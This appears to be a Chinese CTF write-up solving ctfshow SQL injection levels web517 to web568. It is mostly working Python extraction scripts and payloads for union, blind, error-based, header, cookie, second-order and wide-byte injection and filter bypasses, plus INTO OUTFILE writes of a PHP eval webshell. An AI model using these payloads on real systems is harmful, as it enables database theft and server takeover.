web517
union注入,使用'闭合
import requests
import re
def find_flag(text):
flag = re.findall("ctfshow{[0-9a-z-]{36}}",text)
print(flag[0])
def send_request(params):
url = 'http://7409729e-2d15-40b9-8c92-c96092d2a608.challenge.ctf.show/'
proxies = {
"http": "http://127.0.0.1:8080"
}
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
resp = requests.get(url=url,params=params,headers=headers,proxies=proxies)
return resp.text
params1 = {
"id":"-1' union select 1,2,3-- "
}
resp = send_request(params1)
# 查看所有数据库名
params2 = {
"id":"-1' union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),3-- "
}
resp = send_request(params2)
# 查看表名
params3 = {
"id":"-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3-- "
}
resp = send_request(params3)
# 查看列名
params4 = {
"id":"-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3-- "
}
resp = send_request(params4)
# 查看flag
params5 = {
"id":"-1' union select 1,(select group_concat(flag) from ctfshow.flag),3-- "
}
resp = send_request(params5)
find_flag(resp)
web518
布尔注入,不需要闭合
import requests
import re
def find_flag(text):
flag = re.findall("ctfshow{[0-9a-z-]{36}}",text)
print(flag[0])
def send_request(params):
url = 'http://0023f82a-87bb-4405-9718-f612b60ea29c.challenge.ctf.show/'
proxies = {
"http": "http://127.0.0.1:8080"
}
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
resp = requests.get(url=url,params=params,headers=headers,proxies=proxies)
return resp.text
params1 = {
"id":"-1 union select 1,2,3-- "
}
resp = send_request(params1)
# 查看所有数据库名
params2 = {
"id":"-1 union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),3-- "
}
resp = send_request(params2)
# 查看表名
params3 = {
"id":"-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3-- "
}
resp = send_request(params3)
# 查看列名
params4 = {
"id":"-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flagaa'),3-- "
}
resp = send_request(params4)
# 查看flag
params5 = {
"id":"-1 union select 1,(select group_concat(flagac) from ctfshow.flagaa),3-- "
}
resp = send_request(params5)
find_flag(resp)
web519
union注入,使用')闭合
import requests
import re
def find_flag(text):
flag = re.findall("ctfshow{[0-9a-z-]{36}}",text)
print(flag[0])
def send_request(params):
url = 'http://2da78177-bddf-46d6-a6af-1db26a56d066.challenge.ctf.show/'
proxies = {
"http": "http://127.0.0.1:8080"
}
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
resp = requests.get(url=url,params=params,headers=headers,proxies=proxies)
return resp.text
params1 = {
"id":"-1') union select 1,2,3-- "
}
resp = send_request(params1)
# 查看所有数据库名
params2 = {
"id":"-1') union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),3-- "
}
resp = send_request(params2)
# 查看表名
params3 = {
"id":"-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3-- "
}
resp = send_request(params3)
# 查看列名
params4 = {
"id":"-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flagaanec'),3-- "
}
resp = send_request(params4)
# 查看flag
params5 = {
"id":"-1') union select 1,(select group_concat(flagaca) from ctfshow.flagaanec),3-- "
}
resp = send_request(params5)
find_flag(resp)
web520
union注入,使用")闭合
import requests
import re
def find_flag(text):
flag = re.findall("ctfshow{[0-9a-z-]{36}}",text)
print(flag[0])
def send_request(params):
url = 'http://e1bf823f-4a25-4396-99cb-7ad61e90086d.challenge.ctf.show/'
proxies = {
"http": "http://127.0.0.1:8080"
}
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
resp = requests.get(url=url,params=params,headers=headers,proxies=proxies)
return resp.text
params1 = {
"id":"-1\") union select 1,2,3-- "
}
resp = send_request(params1)
# 查看所有数据库名
params2 = {
"id":"-1\") union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),3-- "
}
resp = send_request(params2)
# 查看表名
params3 = {
"id":"-1\") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3-- "
}
resp = send_request(params3)
# 查看列名
params4 = {
"id":"-1\") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flagsf'),3-- "
}
resp = send_request(params4)
# 查看flag
params5 = {
"id":"-1\") union select 1,(select group_concat(flag23) from ctfshow.flagsf),3-- "
}
resp = send_request(params5)
find_flag(resp)
web521
布尔注入,使用'闭合
import requests
url = "http://6f1c2196-49fe-4141-bdbc-7120d82154b3.challenge.ctf.show/?id=1'and "
result = ''
i = 0
proxies = {
"http":"http://127.0.0.1:8080"
}
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
payload = f'if(ascii(substr((select group_concat(flag33) from ctfshow.flagpuck),{i},1))>{mid},1,0)%23'
r = requests.get(url + payload,proxies=proxies)
if "You are in..........." in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
web522
布尔注入,使用"闭合
import requests
url = "http://5adfc251-2ed4-4f73-8de4-287eda414c6e.challenge.ctf.show/?id=1\" and "
result = ''
i = 0
proxies = {
"http":"http://127.0.0.1:8080"
}
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow" ),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow"),{i},1))>{mid},1,0)%23'
payload = f'if(ascii(substr((select group_concat(flag3a3) from ctfshow.flagpa),{i},1))>{mid},1,0)%23'
r = requests.get(url + payload,proxies=proxies)
if "You are in..........." in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
web523
?id=1%27))%20union%20select%20NULL,0x3c3f70687020406576616c28245f504f53545b315d293f3e,NULL%20into%20outfile%20"/var/www/html/1.php"%23
使用into outfile写入shell
<?php @eval($_POST[1])?>
0x3c3f70687020406576616c28245f504f53545b315d293f3e
web524
时间盲注,使用'闭合。
import requests
url = "http://c2e9c750-261e-41b2-b8eb-f2306b836355.challenge.ctf.show//?id=1%27and%20"
result = ''
i = 0
proxies = {
"http":"http://127.0.0.1:8080"
}
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1.5),0)%23'
# payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(0.7),0)%23'
payload = f'if(ascii(substr((select/**/group_concat(flag423)from(ctfshow.flagjugg)),{i},1))>{mid},sleep(0.6),0)%23'
try:
r = requests.get(url + payload,proxies=proxies, timeout=0.5)
tail = mid
except:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
web525
时间盲注,使用'闭合
import requests
url = "http://56ab9933-1353-496e-83ee-3fc733ae8df8.challenge.ctf.show//?id=1%27and%20"
result = ''
i = 0
proxies = {
"http":"http://127.0.0.1:8080"
}
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1.5),0)%23'
# payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(0.7),0)%23'
payload = f'if(ascii(substr((select/**/group_concat(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},sleep(0.6),0)%23'
try:
r = requests.get(url + payload,proxies=proxies, timeout=0.5)
tail = mid
except:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
web526
时间盲注,使用"闭合。
import requests
url = "http://f2b55919-bcd4-4a5f-bec2-d835aee7be4a.challenge.ctf.show/?id=1\"and%20"
result = ''
i = 7
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1.1),0)%23'
payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1.1),0)%23'
payload = f'if(ascii(substr((select/**/group_concat(flag43s)from(ctfshow.flagugs)),{i},1))>{mid},sleep(1.1),0)%23'
try:
r = requests.get(url + payload,timeout=1)
tail = mid
except:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
web527
'闭合
passwd=1&uname=-1'union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctfshow"#
passwd=1&uname=-1'union select 1,group_concat(column_name) from information_schema.columns where table_schema="ctfshow"#
passwd=1&uname=-1'union select 1,group_concat(flag43s) from ctfshow.flagugsd#
web528
")闭合
passwd=1&uname=-1")union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctfshow"#
passwd=1&uname=-1")union select 1,group_concat(column_name) from information_schema.columns where table_schema="ctfshow"#
passwd=1&uname=-1")union select 1,group_concat(flag43as
) from ctfshow.flagugsds#
web529
')闭合
没有回显,使用报错注入updatexml
passwd=1&uname=-1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),0)#
passwd=1&uname=-1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),0)#
passwd=1&uname=-1') and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag)),0)#
passwd=1&uname=-1') and updatexml(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag)),0)#
web530
"闭合
没有回显,使用报错注入updatexml
passwd=1&uname=-1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),0)#
passwd=1&uname=-1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),0)#
passwd=1&uname=-1" and updatexml(1,concat(0x7e,(select flag4s from ctfshow.flagb)),0)#
passwd=1&uname=-1" and updatexml(1,concat(0x7e,(select right(flag4s,20) from ctfshow.flagb)),0)#
web531
'闭合
没有回显及报错信息,使用布尔盲注。
import requests
url = "http://da743c68-9836-40dd-af7d-2260c9256357.challenge.ctf.show/"
result = ''
i = 0
proxy = {
"http":"http://127.0.0.1:8080"
}
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload ={
# "uname":f"-1' or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)#",
# "passwd":"123",
# "submit":"Submit"
# }
# payload ={
# "uname":f"-1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)#",
# "passwd":"123",
# "submit":"Submit"
# }
# payload ={
# "uname":f"-1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow'),{i},1))>{mid},1,0)#",
# "passwd":"123",
# "submit":"Submit"
# }
payload ={
"uname":f"-1' or if(ascii(substr((select group_concat(flag4sa) from ctfshow.flagba),{i},1))>{mid},1,0)#",
"passwd":"123",
"submit":"Submit"
}
# payload =
r = requests.post(url=url, data=payload,proxies=proxy)
if 'flag.jpg' in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
web532
")闭合
没有回显及报错信息,使用布尔盲注。
import requests
url = "http://7e9bdf22-362a-4365-81e7-804e55517648.challenge.ctf.show/"
result = ''
i = 0
proxy = {
"http":"http://127.0.0.1:8080"
}
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload ={
# "uname":f"-1\") or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)#",
# "passwd":"123",
# "submit":"Submit"
# }
# payload ={
# "uname":f"-1\") or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)#",
# "passwd":"123",
# "submit":"Submit"
# }
# payload ={
# "uname":f"-1\") or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow'),{i},1))>{mid},1,0)#",
# "passwd":"123",
# "submit":"Submit"
# }
payload ={
"uname":f"-1\") or if(ascii(substr((select group_concat(flag4sa) from ctfshow.flagbab),{i},1))>{mid},1,0)#",
"passwd":"123",
"submit":"Submit"
}
# payload =
r = requests.post(url=url, data=payload,proxies=proxy)
if 'flag.jpg' in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
web533
'闭合,update型报错注入
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1)#
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow'),0x7e),1)#
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag),0x7e),1)#
uname=admin&passwd=123' and updatexml(1,concat(0x7e,right((select flag4 from ctfshow.flag),20),0x7e),1)#
web534
使用账号admin/admin登录,会显示UA头及IP Referer地址
UA头注入
这里无法使用注释符,使用引号闭合后面的引号。
后端源码:
<?php
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
print_r(mysql_error());
User-Agent: 'and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1) and'
User-Agent: 'and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),1) and'
User-Agent: 'and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),1) and'
User-Agent: 'and updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),1) and'
User-Agent: 'and updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) and'
web535
使用账号admin/admin登录,会显示IP Referer地址
Referer头注入
这里无法使用注释符,使用引号闭合后面的引号。
后端源码:
<?php
$uagent = $_SERVER['HTTP_REFERER'];
$IP = $_SERVER['REMOTE_ADDR'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
print_r(mysql_error());
Referer: 'and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1) and'
Referer: 'and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),1) and'
Referer: 'and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),1) and'
Referer: 'and updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),1) and'
Referer: 'and updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) and'
web536
使用账号admin/admin登录,会显示Cookie值
Cookie头注入
后台源码:
<?php
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
Cookie: uname='and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1)#
Cookie:uname='and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),1)#
Cookie:uname='and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),1)#
Cookie:uname='and updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),1)#
Cookie:uname='and updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1)#
web537
')闭合
使用账号admin/admin登录,会显示base64编码的Cookie值
Cookie头注入
后端源码:
<?php>
$cookee = base64_decode($cookee);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
Cookie: uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCBncm91cF9jb25jYXQoc2NoZW1hX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhKSksMSkj
Cookie:uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0iY3Rmc2hvdyIpKSwxKSM=
Cookie:uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJjdGZzaG93IikpLDEpIw==
Cookie:uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZzQpIGZyb20gY3Rmc2hvdy5mbGFnKSksMSkj
Cookie:uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCByaWdodChmbGFnNCwyMCkgZnJvbSBjdGZzaG93LmZsYWcpKSwxKSM=
web538
"闭合,其他和上题相同
Cookie: uname=ImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzZCwoc2VsZWN0IHJpZ2h0KGZsYWc0LDIwKSBmcm9tIGN0ZnNob3cuZmxhZykpLDEpIw==
Cookie: uname=ImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzZCwoc2VsZWN0IGdyb3VwX2NvbmNhdChmbGFnNCkgZnJvbSBjdGZzaG93LmZsYWcpKSwxKSM=
web539
过滤了注释符的报错注入。
后端源码:
<?php
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id)
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#0000ff">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
id='and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1) and'
id='and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),1) and'
id='and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),1) and'
id='and updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),1) and'
id='and updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) and'
web540
后台源码:
pass_change.php
<?php
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";
}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
可以看到只有$_SESSION["username"]没有被过滤,我们注册账号可以控制值,二次注入。
使用时间盲注,编写脚本(copy from Y4)
import requests
session = requests.session()
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1),0)'
# payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(0.7),0)'
payload = f'if(ascii(substr((select/**/group_concat(flag4)from(ctfshow.flag)),{i},1))>{mid},sleep(0.6),0)'
username = f"admin' and {payload} or '1'='1"
url1 = 'http://88168b56-d788-46e8-be60-ead77e054e6f.challenge.ctf.show/login_create.php'
data = {
'username': username,
'password': '1',
're_password': '1',
'submit': 'Register'
}
r = session.post(url1, data=data)
url2 = 'http://88168b56-d788-46e8-be60-ead77e054e6f.challenge.ctf.show/login.php'
data = {
'login_user': username,
'login_password': '1',
'mysubmit': 'Login',
}
r = session.post(url2, data=data)
url3 = 'http://88168b56-d788-46e8-be60-ead77e054e6f.challenge.ctf.show/pass_change.php'
data = {
'current_password': '1',
'password': '2',
're_password': '2',
'submit': 'Reset'
}
try:
r = session.post(url3,data=data,timeout=0.5)
tail = mid
except:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
web541
过滤了or和and
使用重写绕过
%27aandnd%20updatexml(1,concat(0x3d,(select%20group_concat(schema_name)%20from%20infoorrmation_schema.schemata)),1)--+
%27aandnd%20updatexml(1,concat(0x3d,(select%20group_concat(table_name)%20from%20infoorrmation_schema.tables where table_schema="ctfshow")),1)--+
%27aandnd%20updatexml(1,concat(0x3d,(select%20group_concat(column_name)%20from%20infoorrmation_schema.columns where table_schema="ctfshow")),1)--+
%27aandnd%20updatexml(1,concat(0x3d,(select%20flag4s%20from%20ctfshow.flags)),1)--+
%27aandnd%20updatexml(1,concat(0x3d,(select%20right(flag4s,20)%20from%20ctfshow.flags)),1)--+
web542
不能使用报错注入,但是有回显,使用union注入。
还是同样的双写绕过过滤。
-1%20union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables where table_schema='ctfshow'%23
-1%20union%20select%201,2,group_concat(column_name)%20from%20infoorrmation_schema.columns where table_schema='ctfshow'%23
-1%20union%20select%201,2,group_concat(flag4s)%20from%20ctfshow.flags%23
web543
过滤了空格和注释符
绕过空格方式:
%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空格
这里用括号的方式,和||代替or来绕过。
注释符都被过滤掉了,最后的引号我们需要闭合。
999%27||updatexml(1,concat(0x7e,(select((flag4s))from(ctfshow.flags)),0x7e),1)||%27
999%27||updatexml(1,concat(0x7e,(select(right(flag4s,20))from(ctfshow.flags)),0x7e),1)||%27
web544
')闭合
没有报错信息
使用上题方法,改为布尔盲注。
import requests
url = "http://6ec46794-6350-449e-8a3b-361aac041abf.challenge.ctf.show/"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = f'if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
# payload = f'if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
payload = f'if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0)'
data = {
'id': f"999')||{payload}||('0"
}
r = requests.get(url,params=data)
if "Dumb" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
web545
过滤了select,union,空格
<?php
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
过滤了许多,但还是可以用重写的方式来绕过
因为select过滤了两次,需要多套一层。
报错注入
%27and%0aupdatexml(1,concat(0x3d,(seselselectectlect%0agroup_concat(schema_name)%0afrom%0ainformation_schema.schemata)),1)and%27
直接使用union注入也行
999%27%0auunionnion%0aseseselectlectlect%0a1,(seleseselectlectct%0aflag4s%0afrom%0actfshow.flags),%273
web546
同上题,"闭合
999"%0auunionnion%0aseseselectlectlect%0a1,(seleseselectlectct%0aflag4s%0afrom%0actfshow.flags),"3
web547
')闭合,更改了过滤规则。
<?php
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
过滤了union\s+select,同样使用重写的方式。
999%27)%0aunion%0aunion%0aselectselect%0a1,(select%0aflag4s%0afrom%0actfshow.flags),(%273
web548
同上
web549
提示有waf
分析下代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
//disable error reporting
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
//echo $id1;
whitelist($id1);
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input)
{
$match = preg_match("/^\d+$/", $input);
if($match)
{
//echo "you are good";
//return $match;
}
else
{
header('Location: hacked.php');
//echo "you are bad";
}
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{
$q_s = $query_string;
$qs_array= explode("&",$q_s);
foreach($qs_array as $key => $value)
{
$val=substr($value,0,2);
if($val=="id")
{
$id_value=substr($value,3,30);
return $id_value;
echo "<br>";
break;
}
}
}
发现会对id1进行检查,必须为数字,这里没法绕过,但是传入sql语句的是id,这里id1是获取第一个为id的参数,但是$_GET['id'],会获取最后一个id参数的值。
?id=1&id=-1%27%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web550
同上,"闭合
?id=1&id=-1"%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web551
同上,")闭合
?id=1&id=-1")%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web552
绕过转义函数addslashes
宽字节注入。
mysql有一个特性就是在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围)
%df%27%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web553
同上
web554
也是宽字节注入
uname=%df%27%20union%20select%201,(select%20flag4s%20from%20ctfshow.flags)--+&passwd=&submit=Submit
web555
这里没有引号,不需要绕过addslashes,直接注入就行。
-1%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web556
这里改用了mysql_real_escape_string函数
但是需要在执行sql语句之前调用一下mysql_set_charset函数,设置当前连接的字符集为gbk。才可以完美的防御
同样使用宽字节注入
%df%27%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web557
uname=%df%27%20union%20select%201,(select%20flag4s%20from%20ctfshow.flags)--+&passwd=123&submit=Submit
web558
用了mysqli_multi_query函数,可以使用堆叠注入,但是union注入也可以。
-1%27%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web559
同上
-1%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web560
同上
-1%27)union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web561
同上
-1%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+
web562
username处做了过滤,在passwd处注入。
login_user=123&login_password=-1%20%27union%20select%201,(select%20flag4s%20from%20ctfshow.flags),3--+&mysubmit=Login
web563
同上,')闭合
login_user=132&login_password=-1%20%27)union%20select%201,(select%20flag4s%20from%20ctfshow.flags),3--+&mysubmit=Login
web564
order by类型注入
报错注入
?sort=updatexml(0,(select%20flag4s%20from%20ctfshow.flags),1)
?sort=updatexml(0,(select%20right(flag4s,20)%20from%20ctfshow.flags),1)
web565
同上,'闭合
?sort=%27%20and%20updatexml(0,(select%20flag4s%20from%20ctfshow.flags),1)--+
?sort=%27%20and%20updatexml(0,(select%20right(flag4s,20)%20from%20ctfshow.flags),1)--+
web566
同上,但没有报错输出了
使用盲注的方式
这里还能用into outfile写shell的方式。
?sort=1 into outfile "/var/www/html/1.php"lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e2020--+
写php脚本来查询
<?php
$q=@mysql_query("select flag4s from ctfshow.flags");while($rs=@mysql_fetch_row($q)){echo(" (".$rs[0].")");}
web567
同上
web568
同上,'闭合
参考文章
https://blog.csdn.net/solitudi/article/details/115534124